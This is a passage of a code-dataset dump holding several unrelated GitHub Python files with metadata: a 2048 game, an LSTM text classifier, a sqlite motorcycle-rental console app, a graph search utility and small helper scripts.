DashboardPage(driver=driver)\n","repo_name":"Sobol-EV/2022-1-QAPYTHON-VK-E-Sobol","sub_path":"homework2/ui/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"39510022699","text":"#!/usr/bin/env python3\n#\n# Initialize tables\n\nimport database\n\nsql_file_table = [\n '../sql/oqs_record.sql',\n '../sql/user_record.sql',\n]\n\ndef main():\n cnx = database.connect_db()\n cursor = cnx.cursor()\n for i in sql_file_table:\n with open(i) as f:\n sql_words = f.read()\n cursor.execute(sql_words)\n cursor.close()\n cnx.close()\n\nif __name__ == '__main__':\n main()","repo_name":"wych/oqs.me","sub_path":"database/scripts/create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40028315847","text":"from random import choice\nimport numpy as np\nfrom copy import deepcopy\n\nLEFT, UP, RIGHT, DOWN = 0, 1, 2, 3\nRANDOM_TILES = [2, 2, 2, 2, 2, 2, 2, 2, 2, 4]\n\n\nclass Game():\n\n def __init__(self, board=None) -> None:\n self.game_over = False\n if board is None:\n self.reset()\n else:\n self.__board = board\n self.__score = np.int64(0)\n self.__reward_diff = np.int64(0)\n\n def get_board(self) -> np.ndarray:\n return np.copy(self.__board)\n\n def get_score(self) -> np.int64:\n return self.__score\n\n def get_score_diff(self) -> np.int64:\n return self.__reward_diff\n\n def make_move(self, move, spawn_tile=True) -> None:\n tmp_board = np.rot90(self.__board, move)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = self.__merge__(tmp_board)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = np.rot90(tmp_board, 4-move)\n\n if np.array_equal(tmp_board, self.__board):\n self.game_over = True\n else:\n self.__board = tmp_board\n if spawn_tile:\n self.spawn_random_tile()\n\n self.__check_gameover__()\n\n def branch(self) -> dict:\n res = {}\n for move in range(4):\n tmp_board = deepcopy(self)\n tmp_board.make_move(move)\n res[move] = tmp_board\n return res\n\n def branch_all(self, n: int):\n res = []\n idx_empty_tiles = np.argwhere(board == 0)\n for idx in idx_empty_tiles:\n tmp_b = np.copy(board)\n tmp_b[idx[0], idx[1]] = n\n res.append(tmp_b)\n return res\n\n def reset(self) -> None:\n self.game_over = False\n self.__board = np.zeros((4, 4), dtype=np.int32)\n self.spawn_random_tile()\n self.spawn_random_tile()\n\n def spawn_random_tile(self, n=None) -> None:\n empty_tiles = np.argwhere(self.__board == 0)\n number = choice(RANDOM_TILES) if n is None else n\n idy, idx = choice(empty_tiles)\n self.__board[idy, idx] = number\n\n def __stack__(self, board):\n tmp_board = np.zeros_like(board)\n for i in range(4):\n row = board[i]\n row = row[row != 0]\n tmp_board[i, :len(row)] = row\n return tmp_board\n\n def __merge__(self, board, add_score=True):\n tmp_board = np.copy(board)\n if add_score:\n self.__reward_diff = 0\n for i in range(4):\n for j in range(3):\n if tmp_board[i, j] == tmp_board[i, j+1]:\n tmp_board[i, j+1] = 0\n tmp_board[i, j] = 2*tmp_board[i, j]\n if add_score:\n tmp_score = np.int64(tmp_board[i, j])\n self.__reward_diff += tmp_score\n self.__score += tmp_score\n return tmp_board\n\n def __check_gameover__(self):\n for move in range(4):\n tmp_board = np.rot90(self.__board, move)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = self.__merge__(tmp_board, False)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = 
np.rot90(tmp_board, 4-move)\n if not np.array_equal(tmp_board, self.__board):\n return\n self.game_over = True\n\n\nif __name__ == '__main__':\n bla = np.array([[2, 2, 0, 2], [0, 0, 0, 4], [2, 0, 0, 8], [0, 0, 0, 8]])\n board = Game(bla)\n board.make_move(DOWN)\n print(board.get_score_diff())\n board.make_move(LEFT)\n print(board.get_score_diff())\n print(board.game_over)\n","repo_name":"oswald-martin/zhaw_ai1","sub_path":"P02_2048/martin/py_game.py","file_name":"py_game.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"36870852939","text":"import torch\nimport torch.nn as nn\nfrom torch import tanh\nimport pytorch_lightning as pl\nfrom torch.nn import functional as F\nfrom pytorch_lightning.metrics.functional import accuracy, f1\n\nfrom src.classifier.torch_helpers.regard_classifier import RegardClassifier\n\n\nclass RegardLSTM(RegardClassifier):\n def __init__(\n self,\n n_embed,\n n_hidden,\n n_hidden_lin,\n n_output,\n n_layers,\n lr,\n weight_vector,\n bidirectional,\n gru,\n drop_p,\n drop_p_gru,\n ):\n RegardClassifier.__init__(\n self, n_embed, n_hidden_lin, n_output, lr, weight_vector, drop_p\n )\n drop_p_gru = drop_p_gru if drop_p_gru is not None else 0\n drop_p = drop_p if drop_p is not None else 0\n if gru:\n if n_hidden_lin > 0:\n\n self.lin1 = nn.Linear(n_embed, n_hidden_lin)\n self.dropout = nn.Dropout(drop_p)\n self.lstm = nn.GRU(\n n_hidden_lin,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n\n else:\n self.lstm = nn.GRU(\n n_embed,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n else:\n if n_hidden_lin > 0:\n self.lin1 = nn.Linear(n_embed, n_hidden_lin)\n self.lstm = nn.LSTM(\n n_hidden_lin,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n else:\n self.lstm = nn.LSTM(\n n_embed,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n self.fc = (\n nn.Linear(n_hidden * 2, n_output)\n if bidirectional\n else nn.Linear(n_hidden, n_output)\n )\n\n def forward(self, input_words):\n # INPUT : (batch_size, seq_length)\n if self.n_hidden_lin > 0:\n lin_out = self.lin1(input_words)\n lin_out = tanh(lin_out)\n lin_out = self.dropout(lin_out)\n lstm_out, h = self.lstm(lin_out) # (batch_size, seq_length, n_hidden)\n else:\n lstm_out, h = self.lstm(input_words)\n fc_out = self.fc(lstm_out) # (batch_size, seq_length, n_output)\n fc_out = fc_out[\n :, -1, :\n ] # take only result of end of a sequence (batch_size, n_output)\n\n return fc_out, h\n","repo_name":"krangelie/bias-in-german-nlg","sub_path":"src/classifier/lstm/lstm_classifier.py","file_name":"lstm_classifier.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"} +{"seq_id":"25793228678","text":"import sqlite3\r\nimport os\r\nimport platform\r\nfrom datetime import datetime\r\n\r\nkosongkanCmd = lambda: os.system('cls')\r\nlogin = []\r\n\r\nclass Database:\r\n\tdef __init__(self):\r\n\t\tself.mydb = sqlite3.connect(\"sewaMotor.db\")\r\n\t\tself.mycursor = self.mydb.cursor()\r\n\r\nclass KumpulanQuery(Database):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tDatabase.__init__(self)\r\n\t\tself.query = query\r\n\t\tself.isi = isi\r\n\r\n\tdef masukkanData(self):\r\n\t\tself.mycursor.executemany(self.query, 
self.isi)\r\n\t\tself.mydb.commit()\r\n\r\n\tdef ambilSemuaData(self):\r\n\t\tself.mycursor.execute(self.query)\r\n\t\treturn self.mycursor.fetchall()\r\n\r\n\tdef ambilSemuaDataSpesifik(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\treturn self.mycursor.fetchall()\r\n\r\n\tdef ambilSatuData(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\treturn self.mycursor.fetchone()\r\n\r\n\tdef ubahData(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\tself.mydb.commit()\r\n\r\n\tdef hapusData(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\tself.mydb.commit()\r\n\r\nclass Akun(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef prosesLogin(self, username, password):\r\n\t\tself.query = \"SELECT id_akun, username, nama_user, hak_akses FROM tb_akun WHERE username = ? AND password = ?\"\r\n\t\tself.isi = (username, password)\r\n\r\n\t\thasil = self.ambilSatuData()\r\n\r\n\t\tkosongkanCmd()\r\n\r\n\t\tif(hasil):\r\n\t\t\tlogin.append(hasil)\r\n\t\telse:\r\n\t\t\tprint(\"Username atau password salah\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef registrasi(self, data):\r\n\t\tself.query = \"INSERT INTO tb_akun (username, password, nama_user, no_ktp, alamat, hak_akses) VALUES (?, ?, ?, ?, ?, ?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Berhasil mendaftar. Silahkan login kembali\")\r\n\r\nclass Merk(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputMerk(self, data):\r\n\t\tself.query = \"INSERT INTO tb_merk (nama_merk) VALUES (?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Data berhasil diinput\")\r\n\r\n\tdef ambilMerk(self):\r\n\t\tself.query = \"SELECT * FROM tb_merk\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Merk ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][1]} (ID: {hasil[x][0]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Merk ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilSatuMerk(self, inputan):\r\n\t\tself.query = \"SELECT * FROM tb_merk where id_merk = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\treturn self.ambilSatuData()\r\n\r\n\tdef ubahMerk(self, inputan):\r\n\t\tself.query = \"UPDATE tb_merk SET nama_merk = ? WHERE id_merk = ?\"\r\n\t\tself.isi = inputan\r\n\r\n\t\tself.ubahData()\r\n\t\tprint(\"Berhasil mengubah data\")\r\n\r\n\tdef hapusMerk(self, inputan):\r\n\t\tself.query = \"DELETE FROM tb_merk WHERE id_merk = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\tself.hapusData()\r\n\t\tprint(\"Berhasil menghapus data\")\r\n\r\nclass Jenis(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputJenis(self, data):\r\n\t\tself.query = \"INSERT INTO tb_jenismotor (nama_jenis) VALUES (?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Data berhasil diinput\")\r\n\r\n\tdef ambilJenis(self):\r\n\t\tself.query = \"SELECT * FROM tb_jenismotor\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Jenis ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. 
{hasil[x][1]} (ID: {hasil[x][0]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Merk ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilSatuJenis(self, inputan):\r\n\t\tself.query = \"SELECT * FROM tb_jenismotor where id_jenis = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\treturn self.ambilSatuData()\r\n\r\n\tdef ubahJenis(self, inputan):\r\n\t\tself.query = \"UPDATE tb_jenismotor SET nama_jenis = ? WHERE id_jenis = ?\"\r\n\t\tself.isi = inputan\r\n\r\n\t\tself.ubahData()\r\n\t\tprint(\"Berhasil mengubah data\")\r\n\r\n\tdef hapusJenis(self, inputan):\r\n\t\tself.query = \"DELETE FROM tb_jenismotor WHERE id_jenis = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\tself.hapusData()\r\n\t\tprint(\"Berhasil menghapus data\")\r\n\r\nclass Motor(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputMotor(self, data):\r\n\t\tself.query = \"INSERT INTO tb_motor (id_merk, id_jenis, nama_motor) VALUES (?, ?, ?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Data berhasil diinput\")\r\n\r\n\tdef ambilMotor(self):\r\n\t\tself.query = \"SELECT a.id_motor, b.nama_merk, c.nama_jenis, a.nama_motor FROM tb_motor a INNER JOIN tb_merk b using(id_merk) INNER JOIN tb_jenismotor c using(id_jenis)\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Motor ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][3]} (ID: {hasil[x][0]} | Merk: {hasil[x][1]} | Jenis: {hasil[x][2]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Motor ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilSatuMotor(self, inputan):\r\n\t\tself.query = \"SELECT * FROM tb_motor WHERE id_motor = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\treturn self.ambilSatuData()\r\n\r\n\tdef ubahMotor(self, inputan):\r\n\t\tself.query = \"UPDATE tb_motor SET id_merk = ?, id_jenis = ?, nama_motor = ? WHERE id_motor = ?\"\r\n\t\tself.isi = inputan\r\n\r\n\t\tself.ubahData()\r\n\t\tprint(\"Berhasil mengubah data\")\r\n\r\n\tdef hapusMotor(self, inputan):\r\n\t\tself.query = \"DELETE FROM tb_motor WHERE id_jenis = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\tself.hapusData()\r\n\t\tprint(\"Berhasil menghapus data\")\r\n\r\nclass Transaksi(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputTransaksi(self, data):\r\n\t\tself.query = \"INSERT INTO tb_transaksi (id_motor, id_akun, tanggal_sewa) VALUES (?, ?, ?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Kamu telah menyewa motor. Silahkan cek transaksi saya untuk melihat riwayat\")\r\n\r\n\tdef ambilTransaksiUser(self, inputan):\r\n\t\tself.query = \"SELECT a.id_transaksi, b.nama_motor, a.tanggal_sewa FROM tb_transaksi a INNER JOIN tb_motor b using(id_motor) WHERE a.id_akun = ?\"\r\n\t\tself.isi = (inputan,)\r\n\t\thasil = self.ambilSemuaDataSpesifik()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. 
{hasil[x][1]} (ID: {hasil[x][0]} | tanggal Sewa: {hasil[x][2]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilTransaksi(self):\r\n\t\tself.query = \"SELECT a.id_transaksi, b.nama_motor, c.nama_user, a.tanggal_sewa FROM tb_transaksi a INNER JOIN tb_motor b using(id_motor) INNER JOIN tb_akun c using(id_akun)\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][1]} (ID: {hasil[x][0]} | Nama Penyewa: {hasil[x][2]} | tanggal Sewa: {hasil[x][3]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\ndef merkMotor():\r\n\tprint(\"==========\")\r\n\tprint(\"Merk Motor\")\r\n\tprint(\"==========\")\r\n\tprint(\"1. Tambah Merk\\n2. Tampilkan Merk\\n3. Ubah Merk\\n4. Hapus Merk\")\r\n\tmenu = int(input(\"Pilih Menu: \"))\r\n\r\n\tkosongkanCmd()\r\n\r\n\tif(menu == 1):\r\n\t\tdata = []\r\n\t\tbanyak_data = int(input(\"Masukkan banyak merk: \"))\r\n\r\n\t\tfor x in range(0, banyak_data):\r\n\t\t\tprint(f\"===== Merk {x+1} =====\")\r\n\t\t\tnama_jenis = input(\"Input nama merk: \")\r\n\r\n\t\t\tdata.append((nama_jenis,))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tMerk().inputMerk(data)\r\n\telif(menu == 2):\r\n\t\tMerk().ambilMerk()\r\n\telif(menu == 3):\r\n\t\tcek_data = Merk().ambilMerk()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id merk yang diedit: \"))\r\n\t\t\tdata_ada = Merk().ambilSatuMerk(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tnama_jenis = input(\"Input nama merk: \")\r\n\r\n\t\t\t\tdata = (nama_jenis, inputan)\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMerk().ubahMerk(data)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Merk dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telif(menu == 4):\r\n\t\tcek_data = Merk().ambilMerk()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id merk: \"))\r\n\t\t\tdata_ada = Merk().ambilSatuMerk(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMerk().hapusMerk(inputan)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Merk dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telse:\r\n\t\tpass\r\n\r\ndef jenisMotor():\r\n\tprint(\"==========\")\r\n\tprint(\"Jenis Motor\")\r\n\tprint(\"==========\")\r\n\tprint(\"1. Tambah Jenis\\n2. Tampilkan Jenis\\n3. Ubah Jenis\\n4. 
Hapus Jenis\")\r\n\tmenu = int(input(\"Pilih Menu: \"))\r\n\r\n\tkosongkanCmd()\r\n\r\n\tif(menu == 1):\r\n\t\tdata = []\r\n\t\tbanyak_data = int(input(\"Masukkan banyak jenis: \"))\r\n\r\n\t\tfor x in range(0, banyak_data):\r\n\t\t\tprint(f\"===== Merk {x+1} =====\")\r\n\t\t\tnama_merk = input(\"Input nama jenis motor: \")\r\n\r\n\t\t\tdata.append((nama_merk,))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tJenis().inputJenis(data)\r\n\telif(menu == 2):\r\n\t\tJenis().ambilJenis()\r\n\telif(menu == 3):\r\n\t\tcek_data = Jenis().ambilJenis()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id jenis yang diedit: \"))\r\n\t\t\tdata_ada = Jenis().ambilSatuJenis(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tnama_merk = input(\"Input nama jenis: \")\r\n\r\n\t\t\t\tdata = (nama_merk, inputan)\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tJenis().ubahJenis(data)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Jenis dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telif(menu == 4):\r\n\t\tcek_data = Jenis().ambilJenis()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id jenis: \"))\r\n\t\t\tdata_ada = Jenis().ambilSatuJenis(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tJenis().hapusJenis(inputan)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Jenis dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telse:\r\n\t\tpass\r\n\r\ndef motor():\r\n\tprint(\"==========\")\r\n\tprint(\"Nama Motor\")\r\n\tprint(\"==========\")\r\n\tprint(\"1. Tambah Motor\\n2. Tampilkan Motor\\n3. Ubah Motor\\n4. Hapus Motor\")\r\n\tmenu = int(input(\"Pilih Menu: \"))\r\n\r\n\tkosongkanCmd()\r\n\r\n\tif(menu == 1):\r\n\t\tdata = []\r\n\t\tbanyak_data = int(input(\"Masukkan banyak motor: \"))\r\n\r\n\t\tMerk().ambilMerk()\r\n\t\tJenis().ambilJenis()\r\n\t\tMotor().ambilMotor()\r\n\r\n\t\tfor x in range(0, banyak_data):\r\n\t\t\tprint(f\"===== Merk {x+1} =====\")\r\n\t\t\tid_merk = input(\"Input id merk: \")\r\n\t\t\tid_jenis = input(\"Input id jenis: \")\r\n\t\t\tnama_motor = input(\"Input nama motor: \")\r\n\r\n\t\t\tdata.append((id_merk, id_jenis, nama_motor))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tMotor().inputMotor(data)\r\n\telif(menu == 2):\r\n\t\tMotor().ambilMotor()\r\n\telif(menu == 3):\r\n\t\tcek_data = Motor().ambilMotor()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id motor yang diedit: \"))\r\n\t\t\tdata_ada = Motor().ambilSatuMotor(inputan)\r\n\t\t\t\r\n\t\t\tMerk().ambilMerk()\r\n\t\t\tJenis().ambilJenis()\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tid_merk = input(\"Input id merk: \")\r\n\t\t\t\tid_jenis = input(\"Input id jenis: \")\r\n\t\t\t\tnama_motor = input(\"Input nama motor: \")\r\n\r\n\t\t\t\tdata = (id_merk, id_jenis, nama_motor, inputan)\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMotor().ubahMotor(data)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Motor dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telif(menu == 4):\r\n\t\tcek_data = Motor().ambilMotor()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id motor: \"))\r\n\t\t\tdata_ada = Motor().ambilSatuMotor(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMotor().hapusMotor(inputan)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Motor dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telse:\r\n\t\tpass\r\n\r\ndef sewaMotor():\r\n\thasil = Motor().ambilMotor()\r\n\t\r\n\tif(hasil):\r\n\t\tdata = []\r\n\r\n\t\tid_motor = int(input(\"Pilih id 
motor yang ingin disewa: \"))\r\n\t\tid_akun = login[0][0]\r\n\t\ttanggal_sewa = datetime.today().strftime('%Y-%m-%d')\r\n\r\n\t\tdata.append((id_motor, id_akun, tanggal_sewa))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tTransaksi().inputTransaksi(data)\r\n\telse:\r\n\t\tkosongkanCmd()\r\n\t\tprint(\"Tidak ada motor yang tersedia\")\r\n\r\nwhile True:\r\n\tif(len(login) == 0):\r\n\t\tprint(\"===========================\")\r\n\t\tprint(\"Selamat Datang di Sewa Aja\")\r\n\t\tprint(\"===========================\")\r\n\t\tprint(\"1. Login\")\r\n\t\tprint(\"2. Register Akun\")\r\n\t\tmenu = int(input(\"Pilih menu: \"))\r\n\r\n\t\tkosongkanCmd()\r\n\r\n\t\tif(menu == 1):\r\n\t\t\tusername = input(\"Input username: \")\r\n\t\t\tpassword = input(\"Input password: \")\r\n\r\n\t\t\tkosongkanCmd()\r\n\t\t\tAkun().prosesLogin(username, password)\r\n\t\telif(menu == 2):\r\n\t\t\tusername = input(\"Input username: \")\r\n\t\t\tpassword = input(\"Input password: \")\r\n\t\t\tnama_user = input(\"Input nama user: \")\r\n\t\t\tno_ktp = input(\"Input No KTP: \")\r\n\t\t\talamat = input(\"Input alamat: \")\r\n\t\t\thak_akses = \"0\"\r\n\r\n\t\t\tdata = [(username, password, nama_user, no_ktp, alamat, hak_akses)]\r\n\r\n\t\t\tkosongkanCmd()\r\n\t\t\tAkun().registrasi(data)\r\n\t\telse:\r\n\t\t\tprint(\"Kamu disini dulu\")\r\n\t\t\texit()\r\n\telse:\r\n\t\tif(login[0][3] == \"1\"):\r\n\t\t\tprint(\"==========\")\r\n\t\t\tprint(\"Menu Admin\")\r\n\t\t\tprint(\"==========\")\r\n\t\t\tprint(\"1. Manajemen Merk Motor\")\r\n\t\t\tprint(\"2. Manajemen Jenis Motor\")\r\n\t\t\tprint(\"3. Manajemen Motor\")\r\n\t\t\tprint(\"4. Riwayat Transaksi (Keseluruhan)\")\r\n\t\t\tprint(\"5. Logout\")\r\n\t\t\tmenu = int(input(\"Pilih menu: \"))\r\n\r\n\t\t\tkosongkanCmd()\r\n\r\n\t\t\tif(menu == 1):\r\n\t\t\t\tmerkMotor()\r\n\t\t\telif(menu == 2):\r\n\t\t\t\tjenisMotor()\r\n\t\t\telif(menu == 3):\r\n\t\t\t\tmotor()\r\n\t\t\telif(menu == 4):\r\n\t\t\t\tTransaksi().ambilTransaksi()\r\n\t\t\telif(menu == 5):\r\n\t\t\t\tlogin = []\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(\"Berhasil logout\")\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Kamu disini dulu\")\r\n\t\t\t\texit()\r\n\t\telse:\r\n\t\t\tprint(\"=========\")\r\n\t\t\tprint(\"Menu User\")\r\n\t\t\tprint(\"=========\")\r\n\t\t\tprint(\"1. Sewa Motor\")\r\n\t\t\tprint(\"2. Transaksi Saya\")\r\n\t\t\tprint(\"3. 
Logout\")\r\n\t\t\tmenu = int(input(\"Pilih menu: \"))\r\n\r\n\t\t\tkosongkanCmd()\r\n\r\n\t\t\tif(menu == 1):\r\n\t\t\t\tsewaMotor()\r\n\t\t\telif(menu == 2):\r\n\t\t\t\tTransaksi().ambilTransaksiUser(login[0][0])\r\n\t\t\telif(menu == 3):\r\n\t\t\t\tlogin = []\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(\"Berhasil logout\")\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Kamu disini dulu\")\r\n\t\t\t\texit()","repo_name":"zeeslmn/project.github.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13578,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13105189834","text":"#encoding: utf-8\n\n''' usage:\n\tpython tools/check/para.py $model_file.h5\n'''\n\nimport sys\n\nimport h5py\n\ndef handle_group(srcg):\n\n\trs = 0\n\tfor k, v in srcg.items():\n\t\tif isinstance(v, h5py.Dataset):\n\t\t\trs += v[:].size\n\t\telse:\n\t\t\trs += handle_group(v)\n\n\treturn rs\n\ndef handle(srcf):\n\n\tsfg = h5py.File(srcf, \"r\")\n\trs = handle_group(sfg)\n\tsfg.close()\n\tprint(rs)\n\nif __name__ == \"__main__\":\n\thandle(sys.argv[1])\n","repo_name":"jingyiz/multilingual-translation-attention-head-analysis","sub_path":"tools/check/para.py","file_name":"para.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"15099555916","text":"import heapq\n\n\nclass CheapestItinerary:\n def __init__(self, routes):\n self._graph = self._buildGraph(routes)\n\n def _buildGraph(self, routes):\n graph = {}\n for r in routes:\n if r[0] not in graph:\n graph[r[0]] = []\n\n graph[r[0]].append([r[1], r[2]])\n return graph\n\n def findCheapestPrice(self, src, dest, k):\n q = []\n heapq.heapify(q)\n heapq.heappush(q, [0, src, 0])\n\n while q:\n dqed = heapq.heappop(q)\n\n if dqed[1] == dest:\n return dqed[0]\n\n nbours = self._graph[dqed[1]]\n\n for n in nbours:\n if (dqed[2] + 1) <= k:\n heapq.heappush(q, [dqed[0] + n[1], n[0], dqed[2] + 1])\n\n return -1\n","repo_name":"AashishUpadhyay/SkinThePython","sub_path":"src/cheapestitinerary.py","file_name":"cheapestitinerary.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8630826757","text":"# This file is part of Ripple.\n\n# Ripple is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# Ripple is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with Ripple. 
